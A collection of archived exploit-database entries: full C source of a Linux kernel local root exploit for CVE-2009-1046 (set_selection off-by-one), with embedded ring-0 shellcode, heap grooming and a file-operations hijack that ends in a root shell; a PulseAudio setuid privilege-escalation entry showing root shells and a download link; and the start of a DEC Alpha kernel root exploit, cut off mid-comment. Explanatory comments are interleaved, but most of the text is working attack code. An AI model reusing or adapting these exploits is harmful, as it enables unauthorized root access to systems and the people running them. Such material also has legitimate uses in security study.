sgrakkyu/Linux Kernel <= 2.6.28.3 set_selection() UTF-8 Off By One Local Exploit ( linux)
/* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption
* Linux Kernel <= 2.6.28.3
*
* coded by: sgrakkyu <at> antifork.org
* http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html
*
* Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow
*
* NOTE-1: you need a virtual console attached to the standard output (stdout)
* - physical login
* - ptrace() against some process with the same uid already attached to a VC
* - remote management ..
*
* NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts
* but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)
* If you use an unsupported character expect some sort of recursive fatal ooops:)
*
* Designed to be built as x86-64 binary only (SLUB ONLY)
* SCTP stack has to be available
*
* Tested on target:
* Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
* Ubuntu 8.10 x86_64 (2.6.27_7-10 generic/server)
* Fedora Core 10 x86_64 (default installed kernel - without selinux)
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <errno.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <stdlib.h>
#include <string.h>
#include <linux/tiocl.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/mman.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#ifndef __x86_64__
#error "Architecture Unsupported"
#error "This code was written for x86-64 target and has to be built as x86-64 binary"
#else
#ifndef __u8
#define __u8 uint8_t
#endif
#ifndef __u16
#define __u16 uint16_t
#endif
#ifndef __u32
#define __u32 uint32_t
#endif
#ifndef __u64
#define __u64 uint64_t
#endif
#define STREAM_ZERO 10
#define STREAM_ZERO_ALT 12
#define SCTP_STREAM 22
#define STACK_SIZE 0x1000
#define PAGE_SIZE 0x1000
#define STRUCT_PAGE 0x0000000000000000
#define STRUCT_PAGE_ALT 0x0000000100000000
#define CODE_PAGE 0x0000000000010000
#define LOCALHOST "127.0.0.1"
#define KMALLOC "kmalloc-128"
#define TIMER_LIST_FOPS "timer_list_fops"
#define __msg_f(format, args...) \
do { fprintf(stdout, format, ## args); } while(0)
#define __msg(msg) \
do { fprintf(stdout, "%s", msg); } while(0)
#define __fatal_errno(msg) \
do { perror(msg); __free_stuff(); exit(1); } while(0)
#define __fatal(msg) \
do { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)
#define CJUMP_OFF 13
/* Ring-0 stub that main() copies to CODE_PAGE.  It saves %rdi/%rax, loads the
 * quadword at %gs:0 into %rdi (presumably the current task pointer on this
 * kernel -- not verified here), calls the 8-byte absolute address embedded at
 * offset CJUMP_OFF (the 0x41 placeholder, overwritten with &ring0c in main()),
 * then restores the registers and returns to the kernel caller. */
char ring0[]=
"\x57" // push %rdi
"\x50" // push %rax
"\x65\x48\x8b\x3c\x25\x00\x00\x00\x00" // mov %gs:0x0,%rdi
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41" // mov xxx, %rax   (imm64 starts at byte 13 == CJUMP_OFF)
"\xff\xd0" // callq *%rax
"\x58" // pop %rax
"\x5f" // pop %rdi
"\xc3"; // retq
/* conn struct */
static __u16 srvport;            /* listener port, derived from getpid() in get_port() */
struct sockaddr_in server_s;     /* 127.0.0.1:srvport, filled in by clone_thread(); the only non-static global */
static struct sockaddr_in caddr; /* peer address of the last accepted connection (fd_zmap_srv) */
/* some fds.. */
static int g_array[10];          /* server-side fds accepted after dorec connections (clone_thread) */
static int fd_zmap_srv=-1;       /* == g_array[9]; the sender used by overwrite_fops() */
static int kmalloc_fd=-1;        /* read-only fd on /proc/slabinfo (get_kmalloc_fd) */
static int unsafe_fd[4] = {-1,-1,-1,-1}; /* fds that __free_stuff() must never close */
/* misc */
/* dorec: connection index at which do_socks() saw the kmalloc-128 object count change (0 = not yet);
 * cankill: cleared when the low page cannot be mapped, so the fd-holding child must stay alive;
 * highpage: set in the same case, selects STRUCT_PAGE_ALT in overwrite_fops() */
static int dorec = 0, cankill=1, highpage=0;
static char cstack[STACK_SIZE*2]; /* stack handed to clone() in start_listener(); top minus 8 is used */
static __u16 zstream=STREAM_ZERO; /* SCTP stream the listener replies on; STREAM_ZERO_ALT in the highpage case */
static __u32 uid,gid;            /* pattern ring0c() searches for in kernel memory */
static __u64 fops;               /* get_fops_addr() + 64, written by overwrite_fops() */
static pid_t child=0;            /* pid of the clone()d listener; NOTE: shadowed by a local in migrate_evil_fd() */
static char symbuf[20000];       /* whole-file buffer for /proc/slabinfo (get_total_object) */
/* Close every descriptor from 3 up to (but not including) 2048, keeping only
 * the four recorded in unsafe_fd[].  Used by the __fatal* macros and before
 * exec, so no stray fd survives.  Note: identifiers starting with a double
 * underscore are reserved for the implementation. */
static void __free_stuff()
{
    int fd;
    for (fd = 3; fd < 2048; fd++) {
        int keep = 0;
        int k;
        for (k = 0; k < 4; k++) {
            if (unsafe_fd[k] == fd) {
                keep = 1;
                break;
            }
        }
        if (!keep)
            close(fd);
    }
}
/* Pin the calling thread to CPU 0.  Both main() and the listener call this,
 * presumably so that their allocations come from the same per-CPU slab
 * (assumption -- not verified here).  Exits through __fatal_errno on error. */
static void bindcpu()
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(0, &mask);
    if (sched_setaffinity(0, sizeof(cpu_set_t), &mask) >= 0)
        return;
    __fatal_errno("setaffinity");
}
/* parse functions are not bof-free:) */
/* Scan /proc/kallsyms for the line whose symbol name is TIMER_LIST_FOPS and
 * return its address, or 0 when it is not found.
 *
 * Each line is assumed to be "<hexaddr> <type> <name>\n" with single spaces;
 * the copy into addr[32] is not bounded and the symbol name compare is exact.
 * BUG: fopen() returns NULL on failure, so `stream < 0` never fires and a NULL
 * stream would reach fgets(); `fgets(...) > 0` is a pointer-vs-int compare.
 * Defender note: exposing these addresses to unprivileged readers is what
 * kptr_restrict prevents; with it enabled the address column reads as zero and
 * this function returns 0 (see the check in main(), which does not catch that). */
static __u64 get_fops_addr()
{
    FILE* stream;
    char fbuf[256];
    char addr[32];
    stream = fopen("/proc/kallsyms", "r");
    if(stream < 0)
        __fatal_errno("open: kallsyms");
    memset(fbuf, 0x00, sizeof(fbuf));
    while(fgets(fbuf, 256, stream) > 0)
    {
        char *p = fbuf;
        char *a = addr;
        memset(addr, 0x00, sizeof(addr));
        fbuf[strlen(fbuf)-1] = 0;   /* strip the trailing newline (assumes the line was not truncated) */
        while(*p != ' ')             /* copy the address column; no bound on addr[] */
            *a++ = *p++;
        p += 3;                      /* skip " T " (space, type char, space) */
        if(!strcmp(p, TIMER_LIST_FOPS))
            return strtoul(addr, NULL, 16);
    }
    return 0;
}
/* Read the whole of /proc/slabinfo (fd) into symbuf and return the third
 * column of the line whose first column equals KMALLOC ("kmalloc-128"), i.e.
 * the current number of objects in that cache.  Returns 0 when no such line
 * exists, which main() uses as "not SLUB".
 *
 * The parser is hand-rolled: each of name/used/total is a 32-byte buffer with
 * no length check, header lines are parsed like data lines, and the
 * `while(*p++ != '\n')` skip runs past the buffer if the last line has no
 * newline.  Read errors (ret < 0) are silently treated as end of input. */
static int get_total_object(int fd)
{
    char name[32];
    char used[32];
    char total[32];
    char *ptr[] = {name, used, total};
    int ret,i,toread=sizeof(symbuf)-1;
    char *p = symbuf;
    lseek(fd, 0, SEEK_SET);          /* re-read from the start on every call */
    memset(symbuf, 0x00, sizeof(symbuf));
    while( (ret = read(fd, p, toread)) > 0)
    {
        p += ret;
        toread -= ret;
    }
    p = symbuf;
    do
    {
        /* first three space-separated fields of the line */
        for(i=0; i<sizeof(ptr)/sizeof(void*); i++)
        {
            char *d = ptr[i];
            while(*p != ' ')
                *d++ = *p++;
            *d = 0;
            while(*p == ' ')
                p++;
        }
        while(*p++ != '\n');         /* discard the rest of the line */
        if(!strcmp(KMALLOC, name))
            return atoi(total);
    } while(*p != 0);
    return 0;
}
/* Kernel-mode payload, reached from the ring0 stub with t = the value read
 * from %gs:0 (presumably the current task_struct -- not verified here).
 * Scans 1100 32-bit words for the run uid,uid,uid,uid,gid,gid,gid,gid
 * (the process's own ids, captured in main()) and zeroes them.  Relies on the
 * credential fields living inline in the task structure, which is why the
 * header limits it to pre-cred-struct kernels; there is no bound check against
 * the end of the object. */
static void ring0c(void* t)
{
    int i;
    __u32 *p = t;
    for(i=0; i<1100; i++,p++)
    {
        if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&
           p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)
        {
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            /* dont care about caps */
            break;
        }
    }
}
/* Open /proc/slabinfo read-only and return the descriptor; exits through
 * __fatal_errno when the file cannot be opened (e.g. it is root-only). */
static int get_kmalloc_fd()
{
    int slabinfo = open("/proc/slabinfo", O_RDONLY);
    if(slabinfo < 0)
        __fatal_errno("open: slabinfo");
    return slabinfo;
}
/* Send the one-byte message "a" to s on SCTP stream `channel` with no ppid,
 * flags, ttl or context.  Returns whatever sctp_sendmsg() returns. */
static int write_sctp(int fd, struct sockaddr_in *s, int channel)
{
    struct sockaddr *to = (struct sockaddr *)s;
    return sctp_sendmsg(fd, "a", 1, to, sizeof(struct sockaddr_in),
                        0, 0, channel, 0, 0);
}
/* Set the association's requested stream counts (`out` outbound, `in` maximum
 * inbound) and enable SCTP_NODELAY on fd.  Return values of getsockopt/
 * setsockopt are not checked, so a failure goes unnoticed. */
static void set_sctp_sock_opt(int fd, __u16 in, __u16 out)
{
    struct sctp_initmsg init;
    socklen_t init_len = sizeof(struct sctp_initmsg);
    int nodelay = 1;
    /* read the current INITMSG so the fields we do not set keep their values */
    getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &init, &init_len);
    init.sinit_max_instreams = in;
    init.sinit_num_ostreams = out;
    setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &init, init_len);
    setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&nodelay, sizeof(nodelay));
}
/* Create an SCTP one-to-one socket with SCTP_STREAM in/out streams.
 * Exits through __fatal_errno if the socket cannot be created (no SCTP support). */
static int create_and_init(void)
{
    int sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
    if(sock >= 0)
    {
        set_sctp_sock_opt(sock, SCTP_STREAM, SCTP_STREAM);
        return sock;
    }
    __fatal_errno("socket: sctp");
}
/* Connect fd to s; a failed connect() is fatal (__fatal_errno). */
static void connect_peer(int fd, struct sockaddr_in *s)
{
    socklen_t slen = sizeof(struct sockaddr_in);
    if(connect(fd, (struct sockaddr *)s, slen) >= 0)
        return;
    __fatal_errno("connect: one peer");
}
/* Connect fd to s and immediately send one byte on `stream`.
 * The result of write_sctp() is discarded. */
static void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)
{
    connect_peer(fd, s);
    (void)write_sctp(fd, s, stream);
}
/* Body of the listener started by start_listener() with CLONE_VM|CLONE_FILES,
 * so it shares globals and the fd table with main().  Listens on
 * 127.0.0.1:srvport and answers every accepted connection with one byte on
 * stream zstream.  Once do_socks() has set dorec, the server-side fds of the
 * next connections (from the dorec-th one) are kept in g_array[]; the tenth
 * becomes fd_zmap_srv/caddr and the loop stops.  Returns -1 on setup failure
 * (leaving the listening socket open), 0 after a one-second sleep otherwise.
 *
 * `useless` is unused.  `len` is not reset before each accept(), which may
 * shrink it after a call; harmless here because the peer is always AF_INET. */
static int clone_thread(void*useless)
{
    int o = 1;
    int c=0,idx=0;
    int fd, ret;
    struct sockaddr_in tmp;
    socklen_t len;
    bindcpu();
    server_s.sin_family = PF_INET;
    server_s.sin_port = htons(srvport);
    server_s.sin_addr.s_addr = inet_addr(LOCALHOST);
    fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
    if(fd < 0)
        return -1;
    set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));
    ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));
    if(ret < 0)
        return -1;
    ret = listen(fd, 100);
    if(ret < 0)
        return -1;
    len = sizeof(struct sockaddr_in);
    while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)
    {
        /* dorec is written by do_socks() in the other thread (shared VM) */
        if(dorec != 0 && c >= dorec && idx < 10)
        {
            g_array[idx] = ret;
            if(idx==9)
            {
                fd_zmap_srv = ret;
                caddr = tmp;
                break;
            }
            idx++;
        }
        c++;
        write_sctp(ret, &tmp, zstream);
    }
    sleep(1);
    return 0;
}
/* Map npages RWX anonymous pages at exactly `base` (MAP_FIXED) and zero them.
 * Returns 0 on success, -1 if mmap() fails (e.g. base below mmap_min_addr).
 * MAP_FIXED silently replaces anything already mapped in that range. */
static int do_mmap(unsigned long base, int npages)
{
    size_t bytes = PAGE_SIZE*npages;
    void *region = mmap((void*)base, bytes,
                        PROT_READ|PROT_WRITE|PROT_EXEC,
                        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if(region == MAP_FAILED)
        return -1;
    memset(region, 0x00, bytes);
    return 0;
}
/* Start clone_thread() as a thread sharing memory and the fd table
 * (CLONE_VM|CLONE_FILES), on the upper half of cstack.  Returns the pid from
 * clone(), or -1 on failure (not checked by the caller). */
pid_t start_listener()
{
    char *stack_top = cstack + STACK_SIZE - 8;
    int flags = CLONE_VM | CLONE_FILES | SIGCHLD;
    return clone(clone_thread, stack_top, flags, NULL);
}
/* Open SCTP connections to the listener until the kmalloc-128 object count
 * reported by /proc/slabinfo changes, then open eight more.  The index at
 * which the change was first seen is stored in dorec, which clone_thread()
 * uses to decide which accepted fds to keep.  None of the client fds created
 * here are closed or recorded (the listener holds the server side). */
static void do_socks(struct sockaddr_in *s, __u16 stream)
{
    int i,fd;
    int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;
    int next=8;
    for(i=0; next != 0; i++)
    {
        fd = create_and_init();
        tmp_n_objs = get_total_object(kmalloc_fd);
        if(!dorec && tmp_n_objs != n_objs)
            dorec=i;                 /* first connection after the slab grew */
        conn_and_write(fd, s, stream);
        if(dorec)
            next--;
    }
}
/* Clear the terminal on fd with the ANSI "cursor home" + "erase to end of
 * display" sequence.  Hard-coded escape codes; the original author notes
 * termcap would be the portable way.  The write() result is ignored. */
static void clr(int fd)
{
    static const char seq[] = "\33[H\33[J";
    write(fd, seq, 6);
}
static char tiobuffer[2048];
/* Trigger for CVE-2009-1046: write 128 copies of the 3-byte UTF-8 glyph
 * U+253C to the console on stdout, then ask the console driver (TIOCLINUX /
 * TIOCL_SETSEL) to select columns 1..43 of row 1.  With 3-byte characters the
 * selection buffer the kernel allocates is one character short (the author's
 * commented-out xe = 42 is the largest non-overflowing value).  The kernel-
 * side fix was to size that buffer for multibyte UTF-8 output -- NOTE(review):
 * confirm against the upstream patch, it is not reproduced on this page.
 *
 * Requires stdout to be a virtual console; otherwise the ioctl fails and
 * __fatal() exits.  malloc() is unchecked; `out[]` is filled but never used;
 * the 0xE2/0x94/0xBC initialisers exceed CHAR_MAX where char is signed
 * (implementation-defined conversion, usually a warning). */
void alloc_tioclinux()
{
    int i;
    char out[128*3];
    /* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */
    char utf8[3] = { 0xE2, 0x94, 0xBC };
    //char utf8[3] = { 0xE2, 0x80, 0xBC };
    struct tiocl_selection *sel;
    char *t;
    /* TIOCLINUX argument: subcode byte followed immediately by the selection struct */
    void *v = malloc(sizeof(struct tiocl_selection) + 1);
    t = (char*)v;
    sel = (struct tiocl_selection *)(t+1);
    memset(out, 0x41, sizeof(out));
    for(i=0; i<128; i++)
    {
        tiobuffer[(i*3)]=utf8[0];
        tiobuffer[(i*3)+1]=utf8[1];
        tiobuffer[(i*3)+2]=utf8[2];
    }
    *t = TIOCL_SETSEL;
    sel->xs = 1;
    sel->ys = 1;
    sel->xe = 43;
    //sel->xe = 42; /* no overflow */
    sel->ye = 1;
    /* 384 glyph bytes followed by the zero remainder of tiobuffer */
    write(1, tiobuffer, sizeof(tiobuffer));
    if(ioctl(1, TIOCLINUX, v) < 0)
        __fatal("[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\n");
}
/* Fork a child that keeps the four unsafe_fd[] descriptors open after the
 * parent exec()s a shell.  When cankill is set the child closes them after a
 * 10 s sleep and exits; when it is clear (highpage case) the child sleeps
 * forever and must not be killed.  The parent only prints a message.
 *
 * The local `child` shadows the file-scope `child` (the listener pid).
 * fork() failure (-1) is not handled: -1 is non-zero, so the parent branch
 * runs and reports pid -1. */
static void migrate_evil_fd()
{
    int i;
    pid_t child;
    __msg("[**] Migrate evil unsafe fds to child process..\n");
    child = fork();
    if(!child)
    {
        /* preserve evil fds */
        setsid();                    /* detach from the controlling terminal */
        if(!cankill) /* cant die .. */
            while(1)
                sleep(1);
        else
        {
            sleep(10); /* wait execve() before */
            for(i=0; i<4; i++)
                close(unsafe_fd[i]);
            exit(1);
        }
    }
    else
    {
        if(!cankill)
            __msg_f("[**] Child process %d _MUST_ NOT die ... keep it alive:)\n", child);
    }
}
/* Open /proc/timer_list and issue an ioctl on it, which dispatches through
 * that file's file_operations (the table overwrite_fops() aims at).  On
 * return, close everything except unsafe_fd[], hand those to a child
 * (migrate_evil_fd), close them here too, and exec a shell if getuid() is
 * now 0.  Falls through silently when the uid did not change.
 *
 * The ioctl return value is not checked; /proc/timer_list is readable by
 * unprivileged users on the targeted kernels (the else branch only prints). */
static void trigger_fault()
{
    char *argv[]={"/bin/sh", NULL};
    int fd,i;
    fd = open("/proc/timer_list", O_RDONLY);
    if(fd >= 0)
    {
        ioctl(fd, 0, 0);
        __free_stuff();
        migrate_evil_fd();
        for(i=0; i<4; i++)
            close(unsafe_fd[i]);
        if(!getuid())
        {
            __msg("[**] Got root!\n");
            execve("/bin/sh", argv, NULL);   /* empty environment */
        }
    }
    else
    {
        __msg("[**] Cannot open /proc/timer_list");
        __free_stuff();
    }
}
/* Store `fops` as a 64-bit value at user address 1 (inside the page main()
 * mapped at STRUCT_PAGE) or at STRUCT_PAGE_ALT when highpage is set, then send
 * one byte from `sender` on stream 1 and wait a second before calling
 * trigger_fault().  The mapped page stands in for the kernel object the
 * earlier overflow left pointing into user space; the +64 in `fops` is
 * presumably the slot of the file_operations table that the ioctl path reads
 * (not verified here).
 *
 * `p++` on a NULL pointer is undefined behaviour in C (it works on this
 * target only because the page at 0 was mapped).  `receiver` is unused. */
static void overwrite_fops( int sender,
                            struct sockaddr_in *to_receiver,
                            int receiver)
{
    char *p = NULL;
    if(!highpage)
        p++;
    else
        p = (void*)STRUCT_PAGE_ALT;
    __u64 *uip = (__u64*)p;
    *uip = fops;
    write_sctp(sender, to_receiver, 1);
    sleep(1);
    trigger_fault();
}
/* Derive a listener port from the low 16 bits of the pid, bumped by 0x400 when
 * it would fall into the 1..1024 range (privileged ports).  Result is always
 * >= 0x400; collisions with ports already in use are not detected. */
static __u16 get_port()
{
    __u16 port = (__u16)getpid();
    return port > 0x400 ? port : (__u16)(port + 0x400);
}
/* Entry point.  Sequence: resolve the target symbol, patch the call target
 * into the ring0 stub, check for SLUB via /proc/slabinfo, map the two pages
 * the payload needs (CODE_PAGE for the stub; STRUCT_PAGE or, if page 0 cannot
 * be mapped, STRUCT_PAGE_ALT), start the listener thread, groom kmalloc-128
 * with SCTP connections (do_socks), trigger the console overflow
 * (alloc_tioclinux), open two more peers, and attempt the fops hijack.
 * If control returns, the kernel heap is corrupt, so the process freezes
 * itself with SIGSTOP.  argc/argv are unused. */
int main(int argc, char *argv[])
{
    int peerx, peery,i;
    __u64 *patch;
    srvport = get_port();
    uid=getuid();
    gid=getgid();
    /* BUG: 64 is added before the zero test, so a failed lookup (0) gives
     * fops == 64 and the "Unable to locate symbols" branch never runs. */
    fops=get_fops_addr() + 64;
    if(!fops)
    {
        __msg("[!!] Unable to locate symbols...\n");
        return 1;
    }
    __msg_f("[**] Patching ring0 shellcode with userspace addr: %p\n", ring0c);
    patch = (__u64*)(ring0 + CJUMP_OFF);   /* imm64 of the mov %rax in ring0[] */
    *patch = (__u64)ring0c;
    __msg_f("[**] Using port: %d\n", srvport);
    __msg("[**] Getting slab info...\n");
    kmalloc_fd = get_kmalloc_fd();
    if(!get_total_object(kmalloc_fd))
        __fatal("[!!] Only SLUB allocator supported\n");
    __msg("[**] Mapping Segments...\n");
    __msg("[**] Trying mapping safe page...");
    /* mapping page 0 fails when vm.mmap_min_addr is enforced; the fallback
     * uses a high page and a different SCTP stream id */
    if(do_mmap(STRUCT_PAGE, 1) < 0)
    {
        __msg("Page Protection Present (Unable to Map Safe Page)\n");
        __msg("[**] Mapping High Address Page (dont kill placeholder child)\n");
        if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)
            __fatal_errno("mmap");
        cankill=0; /* dont kill child owning unsafe fds.. */
        highpage=1; /* ssnmap in higher pages */
        zstream=STREAM_ZERO_ALT;
    }
    else
        __msg("Done\n");
    __msg("[**] Mapping Code Page... ");
    if(do_mmap(CODE_PAGE, 1) < 0)
        __fatal_errno("mmap");
    else
        __msg("Done\n");
    memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));
    __msg("[**] Binding on CPU 0\n");
    bindcpu();
    __msg("[**] Start Server Thread..\n");
    child = start_listener();         /* clone() failure (-1) is not checked */
    sleep(3);
    do_socks(&server_s, zstream);
    /* close g_array[7] down to g_array[1]; [0], [8] and [9] stay open */
    for(i=0; i<7; i++)
    {
        close(g_array[8-1-i]);
    }
    clr(1);
    alloc_tioclinux(); // trigger overflow
    peerx = create_and_init();
    connect_peer(peerx, &server_s);
    peery = create_and_init();
    connect_peer(peery, &server_s);
    sleep(1);
    unsafe_fd[0] = peerx;
    unsafe_fd[1] = g_array[8];
    unsafe_fd[2] = peery;
    unsafe_fd[3] = g_array[9];
    __msg("\n");
    __msg_f("[**] Umapped end-to-end fd: %d\n", fd_zmap_srv);
    __msg_f("[**] Unsafe fd: ( ");
    for(i=0; i<4; i++)
        __msg_f("%d ", unsafe_fd[i]);
    __msg(")\n");
    __msg("[**] Hijacking fops...\n");
    overwrite_fops(fd_zmap_srv, &caddr, peery);
    /* if u get here.. something nasty happens...may crash..*/
    __free_stuff();
    __msg("[**] Exploit failed.. freezing process\n");
    kill(getpid(), SIGSTOP);
    return 0;
}
#endif
// milw0rm.com [2009-07-09]
n/a/PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0) ( linux)
PulseAudio setuid Local Privilege Escalation Vulnerability http://www.securityfocus.com/bid/35721 Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster -- Put files in /tmp/pulseaudio-exp (or change config.h). Must be on same fs as the pulseaudio binary. Goes faster if you already have a pulseaudio running ? :p Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0 (x86) Ubuntu: ------------------------------------ $ ./c.sh $ ./pulseaudio-exp Please wait. [*] Seems we are uid = 0 and gid = 0 [*] mv /tmp/pulseaudio-exp/shell /sbin/axx [*] chown root.root /sbin/axx [*] chmod 4755 /sbin/axx Try: /sbin/axx /bin/sh $ /sbin/axx /bin/sh # id uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(adm in),122(sambashare) # uname -a Linux ubuntu 2.6.28-13-generic #45-Ubuntu SMP Tue Jun 30 22:12:12 UTC 2009 x86_64 GNU/Linux ------------------------------------ Slackware ------------------------------------ $ ./c.sh $ ./pulseaudio-exp Please wait. [*] Seems we are uid = 0 and gid = 0 [*] mv /tmp/pulseaudio-exp/shell /sbin/axx [*] chown root.root /sbin/axx [*] chmod 4755 /sbin/axx Try: /sbin/axx /bin/sh $ /sbin/axx /bin/sh sh-3.1# id uid=0(root) gid=0(root) groups=17(audio),100(users),104(pulse-rt) sh-3.1# uname -a Linux slackware 2.6.27.7-smp #2 SMP Thu Nov 20 22:32:43 CST 2008 i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz GenuineIntel GNU/Linux ------------------------------------ download: http://exploit-db.com/sploits/2009-pulseaudio-exp.tar.gz # milw0rm.com [2009-07-20]
Dan Rosenberg/DEC Alpha Linux <= 3.0 Local Root Exploit ( linux)
/*
* DEC Alpha Linux <= 3.0 local root exploit
* by Dan Rosenberg (@djrbliss)
*
* Usage:
* $ gcc alpha-omega.c -o alpha-omega
* $ ./alpha-omega
*
* Notes:
* -Payload specific to <= 2.6.28 (no cred struct, modify as needed)
* -Socket trigger tested on 2.6.28 (adjust offset as needed)
* -INET_DIAG parsing code borrowed from netstat
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/inet_diag.h>
#include <string.h>
#include <sys/mman.h>
#include <errno.h>
#include <netinet/in.h>
#define SYS_osf_wait4 7
#define SOCK_OFFSET 552 /* Offset of sk_destruct fptr in sock
* struct, change for your kernel */
#define PAGE_SIZE 8192 /* DEC alpha page size is 8K */
#define KERNEL_BASE 0xfffffc0000000000 /* DEC alpha PAGE_OFFSET */
#define TASK_STRUCT_OFFSET 64 /* task_struct offset in thread_info */
#define PAYLOAD 0x20000
#define PORT 31337
static int uid, gid;
/* Writes (0xff & value) << 8 to addr */
/* Writes (0xff & value) << 8 to addr */
/* Arbitrary-write primitive: fork a child that exits with `value`, and have
 * the parent wait for it with the OSF wait4 syscall while passing a kernel
 * address as the status pointer.  The syscall then stores the encoded exit
 * status through that pointer -- evidently without checking that it points
 * into user memory, which is the kernel bug this file relies on.  Only the
 * byte (value & 0xff) reaches memory, shifted into the status word's exit
 * code position; main() therefore writes the target one byte at a time.
 *
 * fork() failure (-1) is not handled: the parent branch runs with pid == -1,
 * i.e. it waits for any child. */
void kernel_write(unsigned long addr, int value)
{
    int pid = fork();
    if (pid) {
        /* wait4 backdoor number two? ;) */
        syscall(SYS_osf_wait4, pid, (int *)addr, 0, 1);
        return;
    } else {
        exit(value);
    }
}
/* Get the INET_DIAG cookie for our socket, which contains the low 32 bits
* of the sock struct address */
/* Get the INET_DIAG cookie for our socket, which contains the low 32 bits
 * of the sock struct address */
/* Sends a TCPDIAG_GETSOCK dump request over NETLINK_INET_DIAG and walks the
 * reply looking for the AF_INET entry whose source port equals `port`;
 * returns idiag_cookie[0] for it.  Returns (unsigned)-1 on any error or when
 * the dump ends without a match -- callers cannot tell that from a real
 * cookie of 0xffffffff.
 *
 * BUG: the success path (return of idiag_cookie[0]) leaves fd open.
 * Defender note: the cookie leaking kernel pointer bits to an unprivileged
 * caller is the information-disclosure half of this exploit chain; the
 * /proc/net/tcp path in get_sock_addr() is the other. */
unsigned int get_cookie(unsigned int port)
{
    int fd;
    struct sockaddr_nl nladdr;
    struct {
        struct nlmsghdr nlh;
        struct inet_diag_req r;
    } req;
    struct msghdr msg;
    char buf[8192];
    struct iovec iov;
    struct inet_diag_msg *r;
    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_INET_DIAG)) < 0)
        return -1;
    memset(&nladdr, 0, sizeof(nladdr));
    nladdr.nl_family = AF_NETLINK;
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = TCPDIAG_GETSOCK;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;   /* dump all sockets */
    req.nlh.nlmsg_pid = 0;
    req.nlh.nlmsg_seq = 123456;      /* matched against replies below */
    memset(&req.r, 0, sizeof(req.r));
    req.r.idiag_family = AF_INET;
    req.r.idiag_states = 0xfff;      /* every TCP state */
    req.r.idiag_ext = 0;
    iov.iov_base = &req;
    iov.iov_len = sizeof(req);
    msg = (struct msghdr) {
        .msg_name = (void*)&nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    if (sendmsg(fd, &msg, 0) < 0) {
        close(fd);
        return -1;
    }
    iov.iov_base = buf;
    iov.iov_len = sizeof(buf);
    while (1) {
        int status;
        struct nlmsghdr *h;
        /* positional initialiser: name, namelen, iov, iovlen, control, controllen, flags */
        msg = (struct msghdr) {
            (void*)&nladdr, sizeof(nladdr),
            &iov, 1, NULL, 0, 0
        };
        status = recvmsg(fd, &msg, 0);
        if (status < 0) {
            if (errno == EINTR)
                continue;
            close(fd);
            return -1;
        }
        if (status == 0) {
            close(fd);
            return -1;
        }
        h = (struct nlmsghdr*)buf;
        while (NLMSG_OK(h, status)) {
            if (h->nlmsg_seq == 123456) {
                if (h->nlmsg_type == NLMSG_DONE) {
                    close(fd);
                    return -1;
                }
                if (h->nlmsg_type == NLMSG_ERROR) {
                    close(fd);
                    return -1;
                }
                r = NLMSG_DATA(h);
                if (r->idiag_family == AF_INET &&
                    ntohs(r->id.idiag_sport) == port)
                    return r->id.idiag_cookie[0];   /* fd leaks here */
            }
            h = NLMSG_NEXT(h, status);
        }
    }
    close(fd);   /* unreachable: the loop above only exits via return */
    return -1;
}
/* Get the address of the sock struct for our socket */
/* Get the address of the sock struct for our socket */
/* Parse /proc/net/tcp for the row whose local port is `port` and return the
 * inode/"sock address" column.  When that column is 0 (the page's comment
 * attributes this to kptr_restrict), fall back to the INET_DIAG cookie and
 * rebase it onto KERNEL_BASE.  Returns 0 when the file cannot be opened or
 * the port is not found.
 *
 * BUG: fopen() returns NULL, not a negative value, so `f < 0` never fires and
 * fgets() would be called on NULL.  The sscanf result is unchecked and most
 * columns are read into the same scratch variables `a`/`b`.  A failed
